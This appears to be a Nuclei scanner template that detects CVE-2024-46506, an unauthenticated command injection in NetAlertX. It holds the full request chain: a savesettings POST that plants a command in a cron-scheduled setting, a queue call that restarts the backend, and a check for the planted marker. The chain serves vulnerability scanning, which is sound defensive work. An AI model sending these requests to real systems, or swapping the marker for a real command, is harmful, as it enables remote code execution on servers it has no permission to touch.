id: CVE-2024-46506 info: name: NetAlertX 23.01.14–24.x < 24.10.12 - Remote Code Execution author: s4e-io severity: critical description: | NetAlertX 23.01.14 through 24.x before 24.10.12 allows unauthenticated command injection via settings update because function=savesettings lacks an authentication requirement, as exploited in the wild in May 2025. This is related to settings.php and util.php. impact: | Unauthenticated attackers can execute arbitrary commands on the NetAlertX server without authentication. remediation: | Update NetAlertX to version 24.10.12 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2024-46506 cwe-id: CWE-306 epss-score: 0.6293 epss-percentile: 0.99113 cpe: cpe:2.3:a:netalertx:netalertx:*:*:*:*:*:*:*:* metadata: verified: true fofa-query: title="netalertx" vendor: netalertx product: netalertx tags: cve,cve2024,netalertx,rce,intrusive,vkev,vuln variables: marker: "{{to_lower(rand_base(6))}}" uuid: "{{to_lower(rand_base(8))}}-{{to_lower(rand_base(4))}}-{{to_lower(rand_base(4))}}-{{to_lower(rand_base(4))}}-{{to_lower(rand_base(12))}}" flow: http(1) && http(2) && http(3) http: - raw: - | POST /php/server/util.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded function=savesettings&settings=[["DBCLNP","DBCLNP_RUN","string","schedule"],["DBCLNP","DBCLNP_CMD","string","{{marker}}"],["DBCLNP","DBCLNP_RUN_SCHD","string","* * * * *"]] matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body,"OK")' condition: and internal: true - raw: - | POST /php/server/util.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded function=addToExecutionQueue&action={{uuid}}|cron_restart_backend matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body,"{{uuid}}","added to the execution queue")' condition: and internal: true - raw: - | GET /api/table_settings.json HTTP/1.1 Host: {{Hostname}} {{wait_for(5)}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "{{marker}}")' - 'contains(content_type,"application/json")' condition: and # digest: 490a0046304402200aac7b24e89fcf1d223b6ae73289e0b3233ea78d7d67b12dfb70d247b797071f022029f290cc9466b8d5085f2935d62030776811434c509b29282e76c8f34f28eb5c:922c64590222798bb761d5b6d8e72950